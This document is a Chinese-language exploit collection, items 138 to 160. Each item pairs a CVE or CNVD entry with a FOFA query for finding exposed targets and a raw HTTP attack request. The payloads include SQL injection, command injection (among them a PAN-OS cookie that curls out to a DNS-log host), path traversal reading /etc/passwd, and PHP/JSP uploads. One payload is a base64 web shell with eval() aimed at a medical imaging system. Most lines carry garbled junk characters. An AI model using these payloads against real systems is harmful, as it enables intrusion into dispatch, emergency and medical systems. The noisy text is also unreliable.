2 C9 _$ T: |& O7 x7 U$ }GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1+ _) y4 P' I3 j- d" [* [
Host: x.x.x.x
! k& E/ M/ }: A! H, w$ d1 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
# q. @9 z" f# O0 o3 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 \1 O* C9 c$ C3 M- p. G+ aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; W. ^1 v9 S- D' I
Accept-Encoding: gzip, deflate, br; e$ V' j. F( m4 E
Connection: close. E$ J+ f5 Z% |% _
Upgrade-Insecure-Requests: 1: f; L( o& {9 t) H* P+ g1 p0 e  U

+ F) L8 P7 R* n! k" q4 R  v: J
+ g+ `- N3 m& h! F# O5 m/ ^139. 福建科立讯通信指挥调度平台editemedia.php sql注入
$ h, e% Z5 w, u( _6 ~0 C. z" w1 [CVE-2024-2622, j- ?+ o! G/ s. G/ ~
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台") j/ O+ w7 \6 H# e* l
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1( r+ p- N, R2 D. F8 v: {$ }
Host: x.x.x.x# Z' Y9 N: K( o( p0 `  J* l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.01 a1 o  [+ G4 b# T; t: A; L! j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# o8 ?" u1 S5 @9 |( Y; fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; {7 b- T0 ?6 C' b  C& R, U( ?Accept-Encoding: gzip, deflate, br
( V+ R/ j# M5 ]( ]+ s; vConnection: close1 `& c: b. A. |0 }
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
* v& o  y! z& T, V. E8 m0 vUpgrade-Insecure-Requests: 1; }0 ~9 S0 }+ k
3 M! v5 C. i7 c' s( W

  R$ Z8 G/ a6 @) ~140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
" c) [: r' \' x% RCVE-2024-25668 l: b# I" o4 u, s
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"  Y! w0 s. `& l1 O
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1/ `% b8 _" W3 X$ b; s% N2 x# O
Host: x.x.x.x
% ]- B' [! {. FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
3 d2 O; M9 f# Y+ Q/ GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 K- M* i; R% qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* `- a8 {! ]3 A" ~2 c, w8 I) B' k
Accept-Encoding: gzip, deflate, br  O" R: W( H2 G' g" \
Connection: close
- ?+ d3 u7 e6 x4 ^* k! v2 pCookie: authcode=h8g9
! C- n; f0 N; M4 U1 t% DUpgrade-Insecure-Requests: 1& V; ^  M: ~4 u. Y! e" _
6 [0 r2 \( J0 A) H- z$ t6 u/ w- z

/ E+ c, H+ V! E1 T. L$ H/ ~) U141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入0 g0 q3 I  O! ^, y
FOFA:body="指挥调度管理平台"
) e1 @: u) }1 H; SPOST /app/ext/ajax_users.php HTTP/1.1
0 ^% |3 \; x9 c! x; q0 I( a! T1 ^Host: your-ip" T: G3 x  s, p5 @6 H0 l  ]. `
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
/ o/ ]! Y2 @) g" V6 m# [$ TContent-Type: application/x-www-form-urlencoded
+ s# H4 d+ G; V, L  q: ]- m; K
- k2 Y' t( T9 o! n- I7 g( V. g& i" h# I: J2 ]/ l
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
1 p7 X& O& x7 P5 ~! F3 ~9 z
; B" Q5 P/ L. X9 u( p( {
  a* w1 J2 i4 v& s142. CMSV6车辆监控平台系统中存在弱密码& g6 r; l, i- r7 E
CVE-2024-296665 O9 V, v6 l  d4 W9 j$ ?1 ~) {" V
FOFA:body="/808gps/"( d! ~( [4 P) f# V& j2 A. Y, ]) C9 e
admin/admin- c2 z6 F6 P- B# g8 M  O" c+ w
143. Netis WF2780 v2.1.40144 远程命令执行8 e: a+ x" O' Z) n" s! T$ i
CVE-2024-25850: h3 Y( W' O6 m; ^* t: W
FOFA:title='AP setup' && header='netis'
6 Q, o. O8 l' ]2 iPAYLOAD
* S! @" p  R' q  z" B+ N/ u' T7 g& q2 K: @9 Y  c
144. D-Link nas_sharing.cgi 命令注入
" {5 ?  _: R$ _7 ]- H+ Z5 i2 _FOFA:app="D_Link-DNS-ShareCenter"
- f$ N' j% j( t" gsystem参数用于传要执行的命令5 z) t/ d# _% g* M& i: D7 |
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
. H! B  p$ S" _& b0 wHost: x.x.x.x0 N$ E0 e! a! _( ~
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0) P' H# F" e/ H: v  s
Connection: close
. i. |& d# N) m# T, R8 o/ \9 L* BAccept: */*5 z$ I$ U. A/ y7 J7 V
Accept-Language: en
- U2 X/ k! v. K0 f7 r# o" ?Accept-Encoding: gzip
& T: W) u; z9 A8 l1 @9 R
  @6 R/ }+ p% d
/ V2 q. q4 J2 K1 N+ ]145. Palo Alto Networks PAN-OS GlobalProtect 命令注入( f* j. j) p: X  {% Z1 \  \4 J
CVE-2024-3400  E5 x. n# p) _1 p! o+ b
FOFA:icon_hash="-631559155"
/ S' {, o( U0 R; x# w% ~' j% |GET /global-protect/login.esp HTTP/1.13 V' @2 H1 q) M1 Q+ c6 @0 D! s/ i0 ]* N
Host: 192.168.30.112:1005, u' G9 D8 h! [- s4 B* u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
( P2 i; V- s, c+ Q0 F9 W5 Q6 v' UConnection: close2 Z6 ~  Y' K" Z9 q3 p* x/ z
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;3 b# I( G( }( M2 T& |
Accept-Encoding: gzip
' P  _) J& l3 I/ N" T" K: [' f4 ^% B

( K5 }) d0 z: \7 J( U% j  \# p146. MajorDoMo thumb.php 未授权远程代码执行
  G7 `4 l. x  W. H+ q3 W, CCNVD-2024-02175, I& Z( t3 [; v+ H+ g' K2 `) x' I/ r
FOFA:app="MajordomoSL"
) `+ b' C. }- P  V. O1 Q7 @8 nGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
$ A' L' m; M: r6 AHost: x.x.x.x
* h8 F1 ?2 W  a9 q- M3 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84  l4 {+ S- x. P! P( t0 t, r
Accept-Charset: utf-86 i5 C9 I. A8 y! X# [0 T. T9 @+ j6 P
Accept-Encoding: gzip, deflate
+ M2 l$ }* I0 m  JConnection: close& v5 \" ]! y7 H" P/ n2 u
# Z1 k  N8 l! r9 O2 J
6 M8 L  j* M; G* t8 I. Y  C
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历1 a1 G6 \/ O" a4 c
CVE-2024-32399, P6 d# T% `/ f- T3 m4 @' K
FOFA:body="RaidenMAILD"9 G& T* S+ I9 |
GET /webeditor/../../../windows/win.ini HTTP/1.1% F1 s: G# v, a, \
Host: 127.0.0.1:816 M0 s- z9 [& L: T2 N0 \2 X- @
Cache-Control: max-age=0
2 N4 |# O3 B" m8 n6 n3 F$ [Connection: close. |! {% K# Y( O& d% q

: t* J, r7 U/ V: o5 \+ `+ e& v( r
6 J: o2 ~4 v0 C148. CrushFTP 认证绕过模板注入
3 a" e% Q3 c9 |) P3 ?2 Z5 L/ hCVE-2024-4040
' S2 O4 D: g& C0 O# g& \FOFA:body="CrushFTP"+ [* N% v+ S' J- Z/ L6 X" B4 {0 ?
PAYLOAD: V# ^, a1 T" m1 U3 S

# O/ K6 o. E/ e5 K149. AJ-Report开源数据大屏存在远程命令执行5 `" A  D/ m  p' j
FOFA:title="AJ-Report"/ G* {8 |0 c, r; ]8 a5 Y6 D! E! `

" T) U/ v2 ^# F1 ^$ g* @% @POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
$ d- Q8 q) ?! y  JHost: x.x.x.x
; q; x7 E/ Q; J7 @. RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
; r  H8 ]9 }% L# e: zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; N# g; q# @1 Q1 d# G" BAccept-Encoding: gzip, deflate, br4 Z' f; K' D( m5 q( K0 ?+ g
Accept-Language: zh-CN,zh;q=0.9& m% ^: D3 g5 K6 Z7 ^6 v0 B9 @
Content-Type: application/json;charset=UTF-8
0 o4 Y5 n' K7 _# f/ LConnection: close; r" J4 m2 Z+ V
8 Y' a8 E9 t/ x
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}6 e, p% H+ B' [$ |
7 Z* l( P2 W# D1 S$ L
150. AJ-Report 1.4.0 认证绕过与远程代码执行' f+ O1 L, b* T  p6 |, H. Z: t, g
FOFA:title="AJ-Report"
7 e+ f! v8 J, c3 w7 P& v+ bPOST /dataSetParam/verification;swagger-ui/ HTTP/1.16 q6 w& h1 E7 c, i. @# ?% S4 D
Host: x.x.x.x
: ~  b' w' ^2 |, h* \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
- N) z' m  y, A* U0 b% ?3 y8 v5 E* x% pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 h8 F5 Y, H5 `% j( s) o5 `
Accept-Encoding: gzip, deflate, br% B8 G( z) N  e& }, [
Accept-Language: zh-CN,zh;q=0.9: Q& D" ^" D5 G! q( ~! u* ~
Content-Type: application/json;charset=UTF-8# v, }7 e! u9 t! E! V) g2 L
Connection: close
+ i8 X& y: v# J2 ZContent-Length: 339
" n" h4 ~. r/ n& [1 Q5 G  k/ x( G& Z
! x4 a/ ~/ @8 h{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
% s: B  n- s* Y" L2 ]. ^
$ G7 j* @0 x: z5 b* f* C7 e4 j/ v  o+ k# E/ D
151. AJ-Report 1.4.1 pageList sql注入0 z$ _: o4 B% p8 F
FOFA:title="AJ-Report"
6 _* T6 |+ X9 ], ^$ x! n/ A1 |- P; ~! DGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
' V! }9 r& ~$ I; AHost: x.x.x.x' f0 x* I8 P3 V4 z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" Z/ B% X; C# h+ ~: j$ P" }
Connection: close
3 B! i7 v8 u, {0 M5 a  J4 K! K, e) IAccept-Encoding: gzip
$ g9 j5 ]! c" `: M9 |1 Z
0 i" W5 r, N# ?0 }, b
( v" p0 i( N  O! L4 t& _152. Progress Kemp LoadMaster 远程命令执行
7 E5 L+ S" N- LCVE-2024-1212
/ h5 _. M5 e3 t& Z& R% A1 E& GLoadMaster <= 7.2.59.2 (GA)
- z" p1 e4 b# s, r- K$ u9 qLoadMaster<=7.2.54.8 (LTSF); D6 \( [2 ~7 V) g, Q2 o) s  v4 J
LoadMaster <= 7.2.48.10 (LTS)
4 u1 G: ~$ h. O9 K9 ~* }FOFA:body="LoadMaster"5 g, j* N# ^# z0 A5 j% ^6 @1 n
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码' C# ~. k7 K  C* L* ?. o
GET /access/set?param=enableapi&value=1 HTTP/1.12 s7 K/ o) m' o& u- `/ R# Y
Host: x.x.x.x  r  i) u% y9 k9 z7 ]" z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.19 K( X& W4 Z' K0 |2 D
Connection: close4 J% ^* H. v& a$ q  z! G+ q
Accept: */** L3 E/ B; f$ s% _, T
Accept-Language: en; B7 D, r. D3 t: @' C* Q/ p
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
9 y' I" n2 u' K  d+ \6 d7 {6 E# QAccept-Encoding: gzip
- T. f6 k% \9 s' v. m8 A# J- {& ~5 A. E( ~' V# K! g- x$ d
, n( ?8 L2 ]& Y$ q  I
153. gradio任意文件读取3 k1 p, g, ?, i; J0 N& Z2 P
CVE-2024-1561FOFA:body="__gradio_mode__"; C, l2 w. J, D* M
第一步,请求/config文件获取componets的id$ L( @- n8 D6 [6 ^
http://x.x.x.x/config
0 B7 o; A, ?- L& m  n# c3 z8 j" d; I: W& {. l9 K2 Y% ]

2 H+ \  Q, \6 |. Z  p第二步,将/etc/passwd的内容写入到一个临时文件
/ [! B0 {) U/ d8 J2 k0 {3 BPOST /component_server HTTP/1.1
) y) Z' h8 e7 G; m3 HHost: x.x.x.x
$ P. w/ E  H  O: lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3$ ~& B5 u4 {6 Z5 D1 B4 t" }0 A$ \
Connection: close
$ T. \3 b8 d7 U. O. `6 n3 iContent-Length: 1157 E, b1 s8 |2 m) g" l
Content-Type: application/json
7 E/ q0 a9 g+ O' v. V- CAccept-Encoding: gzip% g/ T( y6 `+ i' X9 E* [
  [9 w2 d; ]/ v, Z8 D7 c* e3 ^
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
' t6 t$ Q) {5 j- S( N
" [% d1 F0 j# b( Y+ _. A8 B' ~  Z1 h8 d! t
第三步访问
* M8 ]  q8 Y, \7 g8 Z3 w$ E$ Rhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd+ W7 @( p4 Q- x( R3 q
* f+ W7 [+ J% s! P) Q7 G4 O
- @3 I7 D& `' @
154. 天维尔消防救援作战调度平台 SQL注入
5 N$ z: u, F: C9 {CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"/ j: X0 l7 ?* m
POST /twms-service-mfs/mfsNotice/page HTTP/1.10 H6 P$ u' X) |# X% r
Host: x.x.x.x
$ E- Q+ t5 y3 kContent-Length: 106) N0 r4 z  ^& m7 v3 }! b
Cache-Control: max-age=0
: v$ x1 X1 m0 f9 |/ s- Z- XUpgrade-Insecure-Requests: 1
7 C6 Z  Y0 f' R5 jOrigin: http://x.x.x.x
- Q2 f8 J! ~3 I: g) N& RContent-Type: application/json
- u4 o4 j8 n# X3 k2 W6 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
/ ?! C1 ]6 z8 ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# O; N2 d* ?; \! f% \) X
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page5 l& V4 [2 i# }& k) O# M
Accept-Encoding: gzip, deflate$ Q& q/ U5 c) q1 F$ ~9 k) j
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
) b: B5 p+ V6 C, D4 uConnection: close
1 W. x( x: k: v' D# F: S2 O
0 E5 y- `- n2 e" ^{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}% G+ A1 o& A6 ]

1 Q3 S$ d6 y8 m( J
) w! h/ D1 v4 [+ ~155. 六零导航页 file.php 任意文件上传1 E) N) W# t. G# k( P' F
CVE-2024-34982$ r/ a& R  |7 \. S2 D
FOFA:title=="上网导航 - LyLme Spage"
, w" b  i0 n* M! rPOST /include/file.php HTTP/1.1
  j) V6 y; k* U9 t0 l2 GHost: x.x.x.x* U. t$ `7 |( j- w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
5 ?. ~0 m9 r) s+ G9 rConnection: close
1 z$ \; `9 u  ?5 H0 v& E. K6 VContent-Length: 232( t- P& Q, g5 Y8 K7 |* H: ~! i# j" u
Accept: application/json, text/javascript, */*; q=0.01% s* j! t* W7 t0 n& C( f
Accept-Encoding: gzip, deflate, br% N# n" Q, a, `) C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# N! G9 N7 E+ k( z9 V
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
' A8 D/ w0 l+ F( j5 E# b, mX-Requested-With: XMLHttpRequest) G, t2 |8 f7 K/ {% f: y
: n/ i) p, K" P; U" r
-----------------------------qttl7vemrsold314zg0f
" d9 f! h8 B- i- s6 W. S' ~9 P& BContent-Disposition: form-data; name="file"; filename="test.php"( V( n1 T0 E$ R8 ~, }$ z# L
Content-Type: image/png( `! M5 V% r2 D

0 [' f6 D6 {" O4 n" O8 l  J<?php phpinfo();unlink(__FILE__);?>6 i# h, M; V0 G  b
-----------------------------qttl7vemrsold314zg0f--
" T# q9 W  N  _0 y8 `/ U$ x* S2 [2 X, o4 ^0 ~7 Q" f; k1 [
+ K! d  |: W& B3 Q: x/ v
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php0 n8 E* U. B& C9 @( T  Q% v
% I- Q" x3 `" R* H8 F6 s/ q
156. TBK DVR-4104/DVR-4216 操作系统命令注入
+ E9 `3 \7 n/ MCVE-2024-3721& O3 ]/ m; q- W# @3 G$ L
FOFA:"Location: /login.rsp"5 A- `" p2 q" o' x- I1 f
·TBK DVR-41047 h4 b; d# F3 a
·TBK DVR-4216
5 e9 S5 B2 }/ N0 U) Ocurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
& m( ^; l: @' A: w4 x+ J$ X' c! a) c
8 Q1 t# S: l* E, I1 a$ i
) V8 p8 j+ ~% z8 B, SPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
8 r7 o$ `$ P/ w! jHost: x.x.x.x) \, s3 U* ~2 o' q% h5 `$ t6 w
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. G; S8 Y6 A" eConnection: close
2 E. N+ q" D2 {$ vContent-Length: 0
! B4 t) n# p" b' {- l: x4 T& uCookie: uid=11 d) ~7 F- K! T- u1 A1 m+ v; t
Accept-Encoding: gzip
1 b' O- i7 a8 L3 W9 i, g
3 m* ^7 J% S) g& ]- l# M% l  [( t
157. 美特CRM upload.jsp 任意文件上传$ n6 q$ D! `4 `* c& H3 n
CNVD-2023-06971
9 i) D, N" C, f6 X( f6 W7 u2 x2 YFOFA:body="/common/scripts/basic.js"
2 i2 {3 w1 k% B2 D8 U/ M  s9 U/ c2 `POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
( V  I7 z& H% j9 qHost: x.x.x.x- P; Q6 f1 T6 W( I& @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36+ ~- s: ]3 i% e
Content-Length: 709; ~/ `, Q  `- S/ m' l) p) T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& ^5 ?3 _! e4 ^0 V, S, ^Accept-Encoding: gzip, deflate" j5 J$ O  Q. P& l. o# S" f
Accept-Language: zh-CN,zh;q=0.9
6 K/ G9 `! D; {& C! [Cache-Control: max-age=0. v7 q. b" Y/ M: U. i1 _
Connection: close
  g  a1 q( j0 a5 KContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
0 q$ w" [- q9 j7 z& w6 [Upgrade-Insecure-Requests: 1
. K$ {/ h: m" n; i* n- w3 a' |; }/ C/ C
------WebKitFormBoundary1imovELzPsfzp5dN
! R, e4 k" x  D: GContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
' h+ U- Q; K0 K2 X" H; z# NContent-Type: application/octet-stream
2 w3 v# v$ Y  c8 _5 B! J! p+ v: Y+ r4 Y% J7 G
nyhelxrutzwhrsvsrafb& @4 H3 ~2 v- t  D, X& l5 x; a
------WebKitFormBoundary1imovELzPsfzp5dN
+ p5 j% Y$ {& p( Q5 bContent-Disposition: form-data; name="key"
0 r, \& {; c1 _$ J% _# m
1 P0 `. U" e: S4 \% v# O, cnull
1 Z0 ?" B4 k* T/ D/ j, h/ i------WebKitFormBoundary1imovELzPsfzp5dN
2 n; x' d$ }% q$ O0 g& VContent-Disposition: form-data; name="form"
$ h$ Y, @) f$ s6 V4 @: s9 a' d
6 C- H: k1 D& w+ ]null
2 e4 H$ Z8 ~- q: y1 X& s; Z------WebKitFormBoundary1imovELzPsfzp5dN9 \6 V% r2 Z  V) f- D
Content-Disposition: form-data; name="field"3 O$ x* A  x/ K" \
/ l* ?: y9 |$ j+ {/ S4 }( h
null4 t) ^! d) W! _2 p4 S! ^
------WebKitFormBoundary1imovELzPsfzp5dN
' r6 i3 [2 \& E8 W6 sContent-Disposition: form-data; name="filetitile"
& q0 e* {% t! W7 h7 j9 X5 ?" V+ X' I( P
null
; [  y- Q7 s, l. g3 s1 \------WebKitFormBoundary1imovELzPsfzp5dN" P4 ]; c& P% n' w$ Y6 c, P" |
Content-Disposition: form-data; name="filefolder"
. X3 u1 i3 a$ G& Q/ \
& w: S* {, s. `, X4 D+ xnull$ R: }, c& V. ?& R
------WebKitFormBoundary1imovELzPsfzp5dN--
2 i1 p; p3 y9 Y) j2 n9 u! |6 |$ P% O
# d; c) S2 d  }8 O
# v9 y' o- {& ahttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
% K1 \/ ?- a1 p0 b9 _3 q; g9 n* Y
& a5 f% \- K+ n$ i& `# B158. Mura-CMS-processAsyncObject存在SQL注入. j6 N& \4 _2 m2 e( ^- u, W
CVE-2024-32640. e. ~- i! I* q$ t5 x; P2 G
FOFA:"Generator: Masa CMS"; l3 l" T: S- q7 K) \
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
/ r3 Q4 N4 }2 v  W1 R3 R3 {; U! ?9 XHost: {{Hostname}}5 p! l' h, z; ?& k
Content-Type: application/x-www-form-urlencoded
0 T3 o0 h$ G4 q! P7 e! k$ v6 U( E. H8 o% |. R! D7 M$ H: S
object=displayregion&contenthistid=x\'&previewid=1  H' w, \& u. C* \- x
2 i3 U6 g+ ]& k, O6 B
& H  O7 {9 @) Q1 q1 ]  \0 G
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
( Y. `) q( A1 ]FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")( i, p2 j: f# A5 n1 s/ B
POST /webservices/WebJobUpload.asmx HTTP/1.1
4 |' o- R$ t9 I0 y! Y- O( bHost: x.x.x.x* Y" j: {6 G) Z1 l) K6 L$ \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
0 v: i. L4 V/ y" y. {Content-Length: 1080: _9 O4 v3 d* c
Accept-Encoding: gzip, deflate4 m! x6 c3 O& E* q/ y  U
Connection: close$ `- E2 N& p2 R: q6 C0 C
Content-Type: text/xml; charset=utf-85 _6 H* W5 m: g; K- J2 ?4 b; i
Soapaction: "http://rainier/jobUpload"
) l/ v- |: C, w2 S; h
4 ^5 @+ r* v5 G+ f3 a) _, W+ C<?xml version="1.0" encoding="utf-8"?>
2 ?' {8 S) ]4 s& r<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
4 Q' W2 Z: b6 C$ g+ r1 V<soap:Body>
9 ~$ E: u+ P: \7 [6 L8 e7 {<jobUpload xmlns="http://rainier">
- y3 n* q6 D/ X8 d<vcode>1</vcode>  R7 G1 |8 u- q; K+ }; n$ p
<subFolder></subFolder>, D! K& D- r# `1 I5 j- a
<fileName>abcrce.asmx</fileName>& J1 E3 ~1 \3 k" A; }  G) }
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
6 L. z' g! y; _7 s5 q$ g$ q  F</jobUpload>
" n3 E+ B; f  s$ D) T6 M( g</soap:Body>  x( k7 d+ t/ q0 E; k# ^
</soap:Envelope>9 I  s* n7 ^. T8 y' ]7 L
4 G2 ^# L0 M% J! o/ H; _  e4 i% ]

/ A( s" E& J; f* a* V- y9 @; V/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")% p1 W6 Y: m1 K8 P6 j- p

8 L# D3 U0 |- y: M2 x- O! t8 c; r0 L( Y- _- e) j; o- X
160. Sonatype Nexus Repository 3目录遍历与文件读取
% n. P8 d* k$ P+ _# R( d2 Q: kCVE-2024-49561 }7 ^/ D- {$ a9 c6 O7 A
FOFA:title="Nexus Repository Manager"
: {4 {& u* S/ A& V6 C) cGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1. g+ p, \9 G) p
Host: x.x.x.x7 m/ S% R: c7 V: g3 F" N% M
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.00 n8 H' W: V% q5 D
Connection: close0 c' u6 L( n) r! `% M  x, @: g
Accept: */*
